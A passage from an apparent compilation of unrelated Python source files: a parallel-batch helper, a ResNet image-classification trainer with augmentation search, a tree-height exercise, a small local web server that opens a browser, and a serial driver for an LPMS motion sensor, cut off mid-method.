progproc = Thread(target=progress_bar, args=(totals, queue))
progproc.start()
# Parallel process the batches
result = Parallel(n_jobs=n_workers)(
delayed(task_wrapper)
(pid, function, batch, queue, *args, **kwargs)
for pid, batch in enumerate(batches)
)
finally:
# Stop the progress bar thread
queue.put('done')
progproc.join()
# Flatten result
flattened = [item for sublist in result for item in sublist]
return flattened
|
model.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import os
import threading
import random
import tensorflow as tf
import torch
import torchvision as tv
import numpy as np
import skeleton
from architectures.resnet import ResNet9, ResNet18
from skeleton.projects import LogicModel, get_logger
from skeleton.projects.others import AUC, five_crop
torch.backends.cudnn.benchmark = True
threads = [
threading.Thread(target=lambda: torch.cuda.synchronize()),
threading.Thread(target=lambda: tf.Session())
]
[t.start() for t in threads]
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
# LOGGER = get_logger(__name__)
def set_random_seed_all(seed, deterministic=False):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
tf.random.set_random_seed(seed)
if deterministic:
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
class Model(LogicModel):
def __init__(self, metadata):
super(Model, self).__init__(metadata)
self.use_test_time_augmentation = False
self.update_transforms = False
def build(self):
base_dir = os.path.dirname(os.path.abspath(__file__))
in_channels = self.info['dataset']['shape'][-1]
num_class = self.info['dataset']['num_class']
[t.join() for t in threads]
self.device = torch.device('cuda', 0)
self.session = tf.Session()
Network = ResNet18
self.model = Network(in_channels, num_class)
self.model_pred = Network(in_channels, num_class).eval()
self.model_9 = ResNet9(in_channels, num_class)
self.model_9_pred = ResNet9(in_channels, num_class).eval()
if Network in [ResNet9, ResNet18]:
model_path = os.path.join(base_dir, 'models')
self.model.init(model_dir=model_path, gain=1.0)
self.model_9.init(model_dir=model_path, gain=1.0)
else:
self.model.init(gain=1.0)
self.model_9.init(gain=1.0)
self.model = self.model.to(device=self.device, non_blocking=True) # .half()
self.model_pred = self.model_pred.to(device=self.device, non_blocking=True) # .half()
self.model_9 = self.model_9.to(device=self.device, non_blocking=True) # .half()
self.model_9_pred = self.model_9_pred.to(device=self.device, non_blocking=True) # .half()
self.is_half = self.model._half
def update_model(self):
num_class = self.info['dataset']['num_class']
epsilon = min(0.1, max(0.001, 0.001 * pow(num_class / 10, 2)))
if self.is_multiclass():
self.model.loss_fn = torch.nn.BCEWithLogitsLoss(reduction='none')
self.tau = 8.0
else:
self.model.loss_fn = torch.nn.CrossEntropyLoss(reduction='none')
self.tau = 8.0
self.model_pred.loss_fn = self.model.loss_fn
self.init_opt()
def init_opt(self):
steps_per_epoch = self.hyper_params['dataset']['steps_per_epoch']
batch_size = self.hyper_params['dataset']['batch_size']
params = [p for p in self.model.parameters() if p.requires_grad]
params_fc = [p for n, p in self.model.named_parameters() if
p.requires_grad and 'fc' == n[:2] or 'conv1d' == n[:6]]
params_not_fc = [p for n, p in self.model.named_parameters() if
p.requires_grad and not ('fc' == n[:2] or 'conv1d' == n[:6])]
init_lr = self.hyper_params['optimizer']['lr']
warmup_multiplier = 2.0
lr_multiplier = max(0.5, batch_size / 32)
scheduler_lr = skeleton.optim.get_change_scale(
skeleton.optim.gradual_warm_up(
skeleton.optim.get_reduce_on_plateau_scheduler(
init_lr * lr_multiplier / warmup_multiplier,
patience=10, factor=.5, metric_name='train_loss'
),
warm_up_epoch=5,
multiplier=warmup_multiplier
),
init_scale=1.0
)
self.optimizer_fc = skeleton.optim.ScheduledOptimizer(
params_fc,
torch.optim.SGD,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.00025,
nesterov=True
)
self.optimizer = skeleton.optim.ScheduledOptimizer(
params,
torch.optim.SGD,
steps_per_epoch=steps_per_epoch,
clip_grad_max_norm=None,
lr=scheduler_lr,
momentum=0.9,
weight_decay=0.00025,
nesterov=True
)
def adapt(self, remaining_time_budget=None):
epoch = self.info['loop']['epoch']
input_shape = self.hyper_params['dataset']['input']
height, width = input_shape[:2]
batch_size = self.hyper_params['dataset']['batch_size']
train_score = np.average([c['train']['score'] for c in self.checkpoints[-5:]])
valid_score = np.average([c['valid']['score'] for c in self.checkpoints[-5:]])
self.use_test_time_augmentation = self.info['loop']['test'] > 3
if self.hyper_params['conditions']['use_fast_auto_aug']:
self.hyper_params['conditions']['use_fast_auto_aug'] = valid_score < 0.995
if self.hyper_params['conditions']['use_fast_auto_aug'] and \
(train_score > 0.995 or self.info['terminate']) and \
remaining_time_budget > 120 and \
valid_score > 0.01 and \
self.dataloaders['valid'] is not None and \
not self.update_transforms:
self.update_transforms = True
self.last_predict = None
self.info['terminate'] = True
original_valid_policy = self.dataloaders['valid'].dataset.transform.transforms
policy = skeleton.data.augmentations.autoaug_policy()
num_policy_search = 100
num_sub_policy = 3
num_select_policy = 5
searched_policy = []
for policy_search in range(num_policy_search):
selected_idx = np.random.choice(list(range(len(policy))), num_sub_policy)
selected_policy = [policy[i] for i in selected_idx]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy + [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
selected_policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device)
]
metrics = []
for policy_eval in range(num_sub_policy * 2):
valid_dataloader = self.build_or_get_dataloader('valid', self.datasets['valid'],
self.datasets['num_valids'])
valid_metrics = self.epoch_valid(self.info['loop']['epoch'], valid_dataloader, reduction='max')
metrics.append(valid_metrics)
loss = np.max([m['loss'] for m in metrics])
score = np.max([m['score'] for m in metrics])
searched_policy.append({
'loss': loss,
'score': score,
'policy': selected_policy
})
flatten = lambda l: [item for sublist in l for item in sublist]
searched_policy = [p for p in searched_policy if p['score'] > valid_score]
if len(searched_policy) > 0:
policy_sorted_index = np.argsort([p['score'] for p in searched_policy])[::-1][:num_select_policy]
policy = flatten([searched_policy[idx]['policy'] for idx in policy_sorted_index])
policy = skeleton.data.augmentations.remove_duplicates(policy)
original_train_policy = self.dataloaders['train'].dataset.transform.transforms
self.dataloaders['train'].dataset.transform.transforms += [
lambda t: t.cpu().float() if isinstance(t, torch.Tensor) else torch.Tensor(t),
tv.transforms.ToPILImage(),
skeleton.data.augmentations.Augmentation(
policy
),
tv.transforms.ToTensor(),
lambda t: t.to(device=self.device)
]
self.dataloaders['valid'].dataset.transform.transforms = original_valid_policy
self.hyper_params['optimizer']['lr'] /= 2.0
self.init_opt()
self.hyper_params['conditions']['max_inner_loop_ratio'] *= 3
self.hyper_params['conditions']['threshold_valid_score_diff'] = 0.00001
self.hyper_params['conditions']['min_lr'] = 1e-8
def activation(self, logits):
if self.is_multiclass():
logits = torch.sigmoid(logits)
prediction = (logits > 0.5).to(logits.dtype)
else:
logits = torch.softmax(logits, dim=-1)
_, k = logits.max(-1)
prediction = torch.zeros(logits.shape, dtype=logits.dtype, device=logits.device).scatter_(-1, k.view(-1, 1),
1.0)
return logits, prediction
def epoch_train(self, epoch, train, model=None, optimizer=None):
model = model if model is not None else self.model
if epoch < 0:
optimizer = optimizer if optimizer is not None else self.optimizer_fc
else:
optimizer = optimizer if optimizer is not None else self.optimizer
model.train()
model.zero_grad()
num_steps = len(train)
metrics = []
if self.switch == True:
self.checkpoints = []
step = 0
for (examples, labels, original_labels) in (self.pre_data * 2):
logits, loss = model(examples, labels, tau=self.tau, reduction='avg')
loss = loss.sum()
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
logits, prediction = self.activation(logits.float())
auc = AUC(logits, original_labels.float())
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
step += 1
self.switch = False
del self.pre_data
else:
for step, (examples, labels) in enumerate(train):
if examples.shape[0] == 1:
examples = examples[0]
labels = labels[0]
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
skeleton.nn.MoveToHook.to((examples, labels), self.device, self.is_half)
logits, loss = model(examples, labels, tau=self.tau, reduction='avg')
loss = loss.sum()
loss.backward()
max_epoch = self.hyper_params['dataset']['max_epoch']
optimizer.update(maximum_epoch=max_epoch)
optimizer.step()
model.zero_grad()
if self.info['loop']['epoch'] < 2:
self.pre_data.append((examples, labels, original_labels))
logits, prediction = self.activation(logits.float())
auc = AUC(logits, original_labels.float())
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
train_loss = np.average([m['loss'] for m in metrics])
train_score = np.average([m['score'] for m in metrics])
optimizer.update(train_loss=train_loss)
return {
'loss': train_loss,
'score': train_score,
}
def epoch_valid(self, epoch, valid, reduction='avg'):
test_time_augmentation = False
self.model.eval()
num_steps = len(valid)
metrics = []
tau = self.tau
with torch.no_grad():
for step, (examples, labels) in enumerate(valid):
original_labels = labels
if not self.is_multiclass():
labels = labels.argmax(dim=-1)
batch_size = examples.size(0)
if self.use_test_time_augmentation and test_time_augmentation:
examples = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
labels = torch.cat([labels, labels], dim=0)
logits, loss = self.model(examples, labels, tau=tau, reduction=reduction)
if self.use_test_time_augmentation and test_time_augmentation:
logits1, logits2 = torch.split(logits, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
logits, prediction = self.activation(logits.float())
if reduction == 'avg':
auc = AUC(logits, original_labels.float())
else:
auc = max([AUC(logits[i:i + 16], original_labels[i:i + 16].float()) for i in
range(int(len(logits)) // 16)])
score = auc
metrics.append({
'loss': loss.detach().float().cpu(),
'score': score,
})
if reduction == 'avg':
valid_loss = np.average([m['loss'] for m in metrics])
valid_score = np.average([m['score'] for m in metrics])
elif reduction in ['min', 'max']:
valid_loss = np.min([m['loss'] for m in metrics])
valid_score = np.max([m['score'] for m in metrics])
else:
raise Exception('not support reduction method: %s' % reduction)
self.optimizer.update(valid_loss=np.average(valid_loss))
return {
'loss': valid_loss,
'score': valid_score,
}
def skip_valid(self, epoch):
return {
'loss': 99.9,
'score': epoch * 1e-4,
}
def prediction(self, dataloader, model=None, test_time_augmentation=True, detach=True, num_step=None):
tau = self.tau
if model is None:
model = self.model_pred
best_idx = np.argmax(np.array([c['valid']['score'] for c in self.checkpoints]))
best_loss = self.checkpoints[best_idx]['valid']['loss']
best_score = self.checkpoints[best_idx]['valid']['score']
states = self.checkpoints[best_idx]['model']
model.load_state_dict(states)
num_step = len(dataloader) if num_step is None else num_step
model.eval()
with torch.no_grad():
predictions = []
for step, (examples, labels) in zip(range(num_step), dataloader):
batch_size = examples.size(0)
height = int(examples.size(2) * 3 / 4)
width = int(examples.size(3) * 3 / 4)
if self.use_test_time_augmentation and test_time_augmentation:
examples1 = torch.cat([examples, torch.flip(examples, dims=[-1])], dim=0)
logits_1 = model(examples1, tau=tau)
logits1, logits2 = torch.split(logits_1, batch_size, dim=0)
logits = (logits1 + logits2) / 2.0
else:
logits = model(examples, tau=tau)
logits, prediction = self.activation(logits)
if detach:
predictions.append(logits.detach().float().cpu().numpy())
else:
predictions.append(logits)
if detach:
predictions = np.concatenate(predictions, axis=0).astype(np.float)
else:
predictions = torch.cat(predictions, dim=0)
return predictions
|
tree_height.py
|
# python3
import sys
import threading
from collections import deque
class Node:
def __init__(self, value):
self.val = value
self.childs = []
def addChild(self, child):
self.childs.append(child)
def cal(arr, i):
if len(arr[i].childs) == 0:
return 1
val = -1
for j in range(len(arr[i].childs)):
val = max(val, cal(arr, arr[i].childs[j]))
return 1 + val
def compute_height(n, parents):
# Replace this code with a faster implementation
arr = [Node(i) for i in range(n)]
# for i in range(n):
# arr[i] = Node(i)
root = -1
for vertex in range(n):
current = parents[vertex]
if current == -1:
root = vertex
pass
else:
arr[current].addChild(vertex)
# print(root)
# for i in range(n):
# print(i, end=' ')
# print(arr[i].childs)
return cal(arr, root)
def main():
n = int(input())
parents = list(map(int, input().split()))
print(compute_height(n, parents))
# In Python, the default limit on recursion depth is rather low,
# so raise it here for this problem. Note that to take advantage
# of bigger stack, we have to launch the computation in a new thread.
sys.setrecursionlimit(10**7) # max depth of recursion
threading.stack_size(2**27) # new thread will get stack of such size
threading.Thread(target=main).start()
|
application.py
|
'''
Created on Jul 24, 2014
@author: gigemjt
'''
import time
from src.connection import server
import BaseHTTPServer
from src.utilities import system
import webbrowser
import threading
HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS FOR REMOTE CONNECTION!!!
PORT_NUMBER = 9000 # Maybe set this to 9000.
CONST_REMOTE = False
CONST_DEFAULT_PAGE = "/web/index.html"
class DevelopmentGraph():
def __init__(self):
t = threading.Thread(target = self.openWebpage)
t.daemon = True
t.start()
try :
self.createServer()
except:
time.sleep(5)
def createServer(self):
server_class = BaseHTTPServer.HTTPServer
httpd = server_class((HOST_NAME, PORT_NUMBER), server.RequestHandler)
print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER)
print 'starting server!'
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
def openWebpage(self):
print "Waiting for server to start"
time.sleep(3)
controller = None
try:
if system.isMac() :
controller = webbrowser.get("open -a /Applications/Google\ Chrome.app %s")
elif system.isLinux():
controller = webbrowser.get('/usr/bin/google-chrome %s')
elif system.isWindows():
controller = webbrowser.get('chrome')
except :
controller = webbrowser.get() # grabs the default (hoping that it is chrome
print 'opening browser'
try:
controller.open('http:' + HOST_NAME+ ":" + str(PORT_NUMBER) + CONST_DEFAULT_PAGE, 2)
except Exception:
print 'EXCEPTION'
print 'window opened'
if __name__ == '__main__':
DevelopmentGraph()
|
LpmsME.py
|
import time
import serial
import threading
import struct
import sys
from datetime import datetime, timedelta
from LpmsConfig import *
from lputils import *
from LpmsConfigurationSettings import LpmsConfigurationSettings
#TODO:
# check serial port opened before executing commands
# add wait for ack routine
class LpmsME(object):
TAG = "LPMSME"
runOnce = True;
verbose = True
is_thread_running = False
sensor_configuration = LpmsConfigurationSettings()
PACKET_ADDRESS0 = 0
PACKET_ADDRESS1 = 1
PACKET_FUNCTION0 = 2
PACKET_FUNCTION1 = 3
PACKET_RAW_DATA = 4
PACKET_LRC_CHECK0 = 5
PACKET_LRC_CHECK1 = 6
PACKET_END = 7
PACKET_LENGTH0 = 8
PACKET_LENGTH1 = 9
current_length = 0
current_function = 0
current_address = 0
rx_state = PACKET_END
in_bytes = []
rx_buffer = []
raw_tx_data = []
rx_index = 0
lrc_check = 0
wait_for_ack = False
wait_for_data = False
is_sensor_connected = False
is_command_mode = False
config_register = 0
status_register = 0
imu_id = 0
timestamp = 0
frame_counter = 0
battery_level = 0
battery_voltage = 0
temperature = 0
acc_x = 0
acc_y = 0
acc_z = 0
gyr_x = 0
gyr_y = 0
gyr_z = 0
mag_x = 0
mag_y = 0
mag_z = 0
angular_vel_x = 0
angular_vel_y = 0
angular_vel_z = 0
quat_w = 0
quat_x = 0
quat_y = 0
quat_z = 0
euler_x = 0
euler_y = 0
euler_z = 0
linacc_x = 0
linacc_y = 0
linacc_z = 0
altitude = 0
pressure = 0
humidity = 0
# debug log
debug_log_size = 0
debug_log_size_index = 0
def __init__(self, port, baudrate):
self.port = port
self.baudrate = baudrate
self.__init_params()
def __clear_params(self):
self.current_length = 0
self.current_function = 0
self.current_address = 0
self.rx_state = self.PACKET_END
self.in_bytes = []
self.rx_buffer = []
self.raw_tx_data = []
self.rx_index = 0
self.lrc_check = 0
self.imu_id = 0
self.timestamp = 0
self.frame_counter = 0
self.battery_level = 0
self.battery_voltage = 0
self.temperature = 0
self.acc_x = 0
self.acc_y = 0
self.acc_z = 0
self.gyr_x = 0
self.gyr_y = 0
self.gyr_z = 0
self.mag_x = 0
self.mag_y = 0
self.mag_z = 0
self.angular_vel_x = 0
self.angular_vel_y = 0
self.angular_vel_z = 0
self.quat_w = 0
self.quat_x = 0
self.quat_y = 0
self.quat_z = 0
self.euler_x = 0
self.euler_y = 0
self.euler_z = 0
self.linacc_x = 0
self.linacc_y = 0
self.linacc_z = 0
self.altitude = 0
self.pressure = 0
self.humidity = 0
self.wait_for_ack = False
self.wait_for_data = False
def __init_params(self):
self.__clear_params()
def __thread_is_alive(self):
try:
return self.thread.isAlive()
except AttributeError:
return False
def __run(self):
""" Method that runs forever """
self.is_thread_running = True
while not self.quit:
self.is_sensor_connected = True
bytesToRead = self.serial_port.inWaiting()
if bytesToRead > 0:
reading = self.serial_port.read(bytesToRead)
#print reading
self.__parse(reading)
self.serial_port.close()
self.is_sensor_connected = False
self.is_thread_running = False
# TODO: add offset length check
def __convert_rxbytes_to_int16(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("h", ''.join(dataList[offset:offset+2]))
return i
def __convert_rxbytes_to_int(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("i", ''.join(dataList[offset:offset+4]))
return i
def __convert_rxbytes_to_float(self, offset, dataList):
"""
dataList is a list
"""
(i,) = struct.unpack("f", ''.join(dataList[offset:offset+4]))
return i
def __convert_int16_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("h", v)
def __convert_int_to_txbytes(self, v):
"""
return bytesarray
"""
return struct.pack("i", v)
def __print_str_to_hex(self, s):
print ":".join("{:02x}".format(ord(c)) for c in s)
# Parser
def __parse_function(self):
cf = self.current_function
if cf == LPMS_ACK:
logd(self.TAG , "Received Ack")
self.wait_for_ack = False
elif cf == LPMS_NACK:
logd(self.TAG , "Received Nack")
self.wait_for_ack = False
elif cf == LPMS_GET_CONFIG:
self.config_register = self.__convert_rxbytes_to_int(0, self.rx_buffer)
#print"{0:b}".format(self.config_register).zfill(32)
self.__parse_configuration_register(self.config_register)
self.wait_for_data = False
elif cf == LPMS_GET_SENSOR_DATA:
if self.sensor_configuration.sixteen_bit_data_enable:
self.__parse_sensor_data(16)
else:
self.__parse_sensor_data()
self.wait_for_data = False
elif cf == GET_BATTERY_LEVEL:
self.battery_level = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_CHARGING_STATUS:
self.chargingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_BATTERY_VOLTAGE:
self.battery_voltage = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_FIRMWARE_VERSION:
vmajor = self.__convert_rxbytes_to_int(8, self.rx_buffer)
vminor = self.__convert_rxbytes_to_int(4, self.rx_buffer)
vbuild = self.__convert_rxbytes_to_int(0, self.rx_buffer)
self.firmwareVersion = str(vmajor) + "." + str(vminor) + "." + str(vbuild)
self.wait_for_data = False
elif cf == GET_PING:
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = self.__convert_rxbytes_to_int(0, self.rx_buffer)
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
elif cf == GET_TEMPERATURE:
self.temperature = self.__convert_rxbytes_to_float(0, self.rx_buffer)
self.wait_for_data = False
elif cf == GET_DEBUG_LOGGING_STATUS:
self.debugLoggingStatus = self.__convert_rxbytes_to_int(0, self.rx_buffer)
logd(self.TAG , "Debug Logging Status: "+str(self.debugLoggingStatus))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG_SIZE:
self.debug_log_size = self.__convert_rxbytes_to_int(0, self.rx_buffer) / 32
logd(self.TAG , "Debug Logging Size: "+str(self.debug_log_size))
self.wait_for_data = False
elif cf == GET_DEBUG_LOG:
log = str(self.__convert_rxbytes_to_int(0, self.rx_buffer)) + ','
log += str(float(self.__convert_rxbytes_to_int16(4, self.rx_buffer))/100) + ','
log += str(float(self.__convert_rxbytes_to_int16(6, self.rx_buffer))/1000) + ','
log += str(self.__convert_rxbytes_to_float(8, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(12, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(16, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(20, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(24, self.rx_buffer)) + ','
log += str(self.__convert_rxbytes_to_float(28, self.rx_buffer))
if self.debug_log_size_index == 0:
filename = "DebugLog-"+datetime.now().strftime("%Y%m%d-%H%M%S")+".csv"
logd(self.TAG , "Saving to "+ filename)
self.fo = open(filename, "wb")
self.startTime = datetime.now()
self.fo.write(log+'\n')
self.debug_log_size_index += 1
self.__update_progress(self.debug_log_size_index)
if self.debug_log_size_index >= self.debug_log_size:
self.fo.close()
dt = (datetime.now()-self.startTime).total_seconds()
print
logd(self.TAG , "Debug log download completed")
print "Elapsed time:", str(dt)
def __update_progress(self, progress):
percent = int(progress*100/self.debug_log_size)
sys.stdout.write("\rDownloading: %d%%, %d, %d" % (percent, progress, self.debug_log_size))
sys.stdout.flush()
def __parse(self, data):
self.lrcReceived = 0
for b in data:
if self.rx_state == self.PACKET_END:
if (b == ':'):
self.rx_state = self.PACKET_ADDRESS0
elif self.rx_state == self.PACKET_ADDRESS0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_ADDRESS1
elif self.rx_state == self.PACKET_ADDRESS1:
self.in_bytes.append(b)
self.current_address = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.imu_id = self.current_address
self.rx_state = self.PACKET_FUNCTION0
elif self.rx_state == self.PACKET_FUNCTION0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_FUNCTION1
elif self.rx_state == self.PACKET_FUNCTION1:
self.in_bytes.append(b)
self.current_function = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_LENGTH0
elif self.rx_state == self.PACKET_LENGTH0:
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LENGTH1
elif self.rx_state == self.PACKET_LENGTH1:
self.in_bytes.append(b)
self.current_length = self.__convert_rxbytes_to_int16(0, self.in_bytes)
self.rx_state = self.PACKET_RAW_DATA
self.rx_index = 0
self.rx_buffer = []
elif self.rx_state == self.PACKET_RAW_DATA:
if self.rx_index == self.current_length:
self.lrc_check = self.current_address + self.current_function + self.current_length
self.lrc_check = self.lrc_check + sum([ord(c) for c in self.rx_buffer])
self.in_bytes = []
self.in_bytes.append(b)
self.rx_state = self.PACKET_LRC_CHECK1
else:
# add length check
self.rx_buffer.append(b)
self.rx_index = self.rx_index + 1
elif self.rx_state == self.PACKET_LRC_CHECK1:
self.in_bytes.append(b)
self.lrcReceived = self.__convert_rxbytes_to_int16(0, self.in_bytes)
if self.lrcReceived == self.lrc_check:
self.__parse_function()
self.rx_state = self.PACKET_END
else:
self.rx_state = self.PACKET_END
def __parse_sensor_data(self, data_mode=32):
o = 0
r2d = 57.2958
if data_mode == 16:
converter = lambda offset, l: float(self.__convert_rxbytes_to_int16(offset, l)) / 1000.0
increment = 2
else:
converter = lambda offset, l: self.__convert_rxbytes_to_float(offset, l)
increment = 4
# TODO: Add timestamp counter mode/elapsed mode
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
o += 4
if self.runOnce:
self.frame_counter = self.timestamp
self.runOnce = False
else:
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_y = converter(o, self.rx_buffer) * r2d
o += increment
self.gyr_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.accelerometer_enable:
self.acc_x = converter(o, self.rx_buffer)
o += increment
self.acc_y = converter(o, self.rx_buffer)
o += increment
self.acc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.magnetometer_enable:
self.mag_x = converter(o, self.rx_buffer)
o += increment
self.mag_y = converter(o, self.rx_buffer)
o += increment
self.mag_z = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.mag_x *= 10
self.mag_y *= 10
self.mag_z *= 10
if self.sensor_configuration.angular_velocity_enable:
self.angular_vel_x = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_y = converter(o, self.rx_buffer) * r2d
o += increment
self.angular_vel_z = converter(o, self.rx_buffer) * r2d
o += increment
if self.sensor_configuration.quaternion_enable:
self.quat_w = converter(o, self.rx_buffer)
o += increment
self.quat_x = converter(o, self.rx_buffer)
o += increment
self.quat_y = converter(o, self.rx_buffer)
o += increment
self.quat_z = converter(o, self.rx_buffer)
o += increment
# 10000 Fixed point
if data_mode == 16:
self.quat_w /= 10
self.quat_x /= 10
self.quat_y /= 10
self.quat_z /= 10
if self.sensor_configuration.euler_enable:
self.euler_x = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_y = converter(o, self.rx_buffer) * r2d
o += increment
self.euler_z = converter(o, self.rx_buffer) * r2d
o += increment
# 10000 Fixed point
if data_mode == 16:
self.euler_x/= 10
self.euler_y/= 10
self.euler_z/= 10
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = converter(o, self.rx_buffer)
o += increment
self.linacc_y = converter(o, self.rx_buffer)
o += increment
self.linacc_z = converter(o, self.rx_buffer)
o += increment
if self.sensor_configuration.pressure_enable:
self.pressure = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.pressure *= 100
if self.sensor_configuration.altitude_enable:
self.altitude = converter(o, self.rx_buffer)
o += increment
# 10 Fixed point
if data_mode == 16:
self.altitude *= 100
if self.sensor_configuration.temperature_enable:
self.temperature = converter(o, self.rx_buffer)
o += increment
# 100 Fixed point
if data_mode == 16:
self.temperature *= 10
def __parse_sensor_data_16bit(self):
o = 0
r2d = 57.2958
if self.sensor_configuration.timestamp_counter_mode_enable:
self.timestamp = float(self.__convert_rxbytes_to_int(0, self.rx_buffer))
else:
self.timestamp = self.__convert_rxbytes_to_float(0, self.rx_buffer)
o += 4
self.frame_counter += 1
if self.sensor_configuration.gyro_enable:
self.gyr_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
self.gyr_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0 * r2d
o += 2
if self.sensor_configuration.accelerometer_enable:
self.acc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.acc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.magnetometer_enable:
self.mag_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
self.mag_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
if self.sensor_configuration.quaternion_enable:
self.quat_w = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
self.quat_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0
o += 2
if self.sensor_configuration.euler_enable:
self.euler_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
self.euler_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 10000.0 * r2d
o += 2
if self.sensor_configuration.linear_acceleration_enable:
self.linacc_x = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_y = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
self.linacc_z = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 1000.0
o += 2
if self.sensor_configuration.pressure_enable:
self.pressure = float(self.__convert_rxbytes_to_int16(o, self.rx_buffer)) / 100.0
o += 2
# communication
def __get_config_register(self):
if not self.is_connected():
loge(self.TAG, "sensor not connected")
return None
if self.verbose: logd(self.TAG, "Get config register")
time.sleep(.1)
self.__lpbus_set_none(LPMS_GET_CONFIG)
self.wait_for_data = True
self.__wait_for_response()
def __send_data(self, function, length):
txlrc_check = 0
txBuffer = chr(0x3a)
txBuffer += self.__convert_int16_to_txbytes(self.imu_id)
txBuffer += self.__convert_int16_to_txbytes(function)
txBuffer += self.__convert_int16_to_txbytes(length)
if length > 0:
txBuffer += self.raw_tx_data
txlrc_check = self.imu_id + function + length
if length > 0:
txlrc_check += sum([ord(c) for c in self.raw_tx_data])
txBuffer += self.__convert_int16_to_txbytes(txlrc_check)
txBuffer += chr(0x0d)
txBuffer += chr(0x0a)
# debug purpose
# self.__print_str_to_hex(txBuffer)
bytesSent = self.serial_port.write(txBuffer)
def __lpbus_set_none(self, command):
self.__send_data(command, 0)
def __lpbus_set_int32(self, command, v):
self.raw_tx_data = self.__convert_int_to_txbytes(v)
self.__send_data(command, 4)
def __lpbus_set_data(self, command, length, dataBuffer):
self.raw_tx_data = dataBuffer
self.__send_data(command, length)
def __wait_for_response(self):
while self.wait_for_ack or self.wait_for_data:
time.sleep(.1)
def __parse_configuration_register(self, cr):
self.sensor_configuration.parse(cr)
# User command
def connect(self):
if self.__thread_is_alive():
loge(self.TAG, "Another connection established")
return False
try:
self.__clear_params()
self.thread = threading.Thread(target=self.__run, args=())
